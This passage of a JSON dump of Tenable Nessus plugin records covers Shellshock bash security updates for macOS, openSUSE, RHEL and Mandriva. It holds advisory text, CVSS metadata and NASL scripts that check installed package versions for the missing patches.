\"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\npatch = '2014-005';\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:'-');\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.[89]([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.8 / 10.9\");\nelse if (\"Mac OS X 10.8\" >< os && !ereg(pattern:\"Mac OS X 10\\.8($|\\.[0-5]([^0-9]|$))\", string:os)) exit(0, \"The remote host uses a version of Mac OS X Mountain Lion later than 10.8.5.\");\nelse if (\"Mac OS X 10.9\" >< os && !ereg(pattern:\"Mac OS X 10\\.9($|\\.[0-5]([^0-9]|$))\", string:os)) exit(0, \"The remote host uses a version of Mac OS X Mavericks later than 10.9.5.\");\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.security\\..*bom$\", string:packages);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = eregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:13", "description": "- Replace patches bash-4.2-heredoc-eof-delim.patch and bash-4.2-parse-exportfunc.patch with the official upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream patch level bash42-051\n\n - Make bash-4.2-extra-import-func.patch an optional patch due instruction\n\n - Remove and replace patches bash-4.2-CVE-2014-6271.patch bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is based on the BSD patch of Christos. As further enhancements the option import-functions is mentioned in the manual page and a shopt switch is added to enable and disable import-functions on the fly", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-10-21T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1308-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:12.3"], "id": "OPENSUSE-2014-594.NASL", "href": "https://www.tenable.com/plugins/nessus/78590", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-594.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78590);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2014-7187\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1308-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- Replace patches bash-4.2-heredoc-eof-delim.patch and\n bash-4.2-parse-exportfunc.patch with the official\n upstream patch levels bash42-052 and bash42-053\n\n - Replace patch bash-4.2-CVE-2014-7187.patch with upstream\n patch level bash42-051\n\n - Make bash-4.2-extra-import-func.patch an optional patch\n due instruction\n\n - Remove and replace patches bash-4.2-CVE-2014-6271.patch\n bash-4.2-BSC898604.patch bash-4.2-CVE-2014-7169.patch\n with bash upstream patch 48, patch 49, and patch 50\n\n - Add patch bash-4.2-extra-import-func.patch which is\n based on the BSD patch of Christos. As further\n enhancements the option import-functions is mentioned in\n the manual page and a shopt switch is added to enable\n and disable import-functions on the fly\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=896776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898346\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2014-10/msg00023.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-debuginfo-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-debugsource-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-devel-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-lang-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-loadables-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-loadables-debuginfo-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreadline6-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreadline6-debuginfo-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"readline-devel-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-61.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-61.19.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo-32bit / bash-debuginfo / bash-debugsource / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:12:28", "description": "[Updated September 30, 2014] This advisory has been updated with information on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support, Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update. Note that certain services, screen sessions, and tmux sessions may need to be restarted, and affected interactive users may need to re-login. Installing these updated packages without restarting services will address the vulnerability, but functionality may be impacted until affected services are restarted. For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 4 / 5 / 6 : bash (RHSA-2014:1311)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bash", "p-cpe:/a:redhat:enterprise_linux:bash-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bash-doc", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:5.9", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.2", "cpe:/o:redhat:enterprise_linux:6.4"], "id": "REDHAT-RHSA-2014-1311.NASL", "href": "https://www.tenable.com/plugins/nessus/79052", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1311. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79052);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137, 70152, 70154);\n script_xref(name:\"RHSA\", value:\"2014:1311\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"RHEL 4 / 5 / 6 : bash (RHSA-2014:1311)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"[Updated September 30, 2014] This advisory has been updated with\ninformation on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 4 Extended Life Cycle Support, Red Hat\nEnterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended\nUpdate Support, Red Hat Enterprise Linux 6.2 Advanced Update Support,\nand Red Hat Enterprise Linux 6.4 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update. Note that certain services, screen sessions,\nand tmux sessions may need to be restarted, and affected interactive\nusers may need to re-login. Installing these updated packages without\nrestarting services will address the vulnerability, but functionality\nmay be impacted until affected services are restarted. For more\ninformation see the Knowledgebase article at\nhttps://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/articles/1200223\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1311\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7187\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5\\.6|5\\.9|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.6 / 5.9 / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1311\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"bash-3.0-27.el4.4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"bash-3.0-27.el4.4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"bash-3.2-24.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"bash-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"bash-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"bash-3.2-24.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"bash-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"bash-debuginfo-3.2-24.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"bash-debuginfo-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"bash-debuginfo-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"bash-debuginfo-3.2-24.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"bash-debuginfo-3.2-32.el5_9.3\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bash-4.1.2-15.el6_4.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"bash-4.1.2-15.el6_4.2\")) flag++;\n\nif (sp == \"2\") { if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"bash-4.1.2-9.el6_2.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-4.1.2-15.el6_4.2\")) flag++; }\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bash-debuginfo-4.1.2-15.el6_4.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"bash-debuginfo-4.1.2-15.el6_4.2\")) flag++;\n\nif (sp == \"2\") { if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.1.2-9.el6_2.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.1.2-15.el6_4.2\")) flag++; }\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bash-doc-4.1.2-15.el6_4.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"bash-doc-4.1.2-15.el6_4.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bash-doc-4.1.2-15.el6_4.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"bash-doc-4.1.2-9.el6_2.2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:59", "description": "It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue (CVE-2014-7169, CVE-2014-7186, CVE-2014-7187).\n\nAdditionally bash has been updated from patch level 37 to 48 using the upstream patches at ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/ which resolves various bugs.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : bash (MDVSA-2014:190)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:bash", "p-cpe:/a:mandriva:linux:bash-doc", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-190.NASL", "href": "https://www.tenable.com/plugins/nessus/77950", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:190. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77950);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137);\n script_xref(name:\"MDVSA\", value:\"2014:190\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Mandriva Linux Security Advisory : bash (MDVSA-2014:190)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue\n(CVE-2014-7169, CVE-2014-7186, CVE-2014-7187).\n\nAdditionally bash has been updated from patch level 37 to 48 using the\nupstream patches at ftp://ftp.gnu.org/gnu/bash/bash-4.2-patches/ which\nresolves various bugs.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1311\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 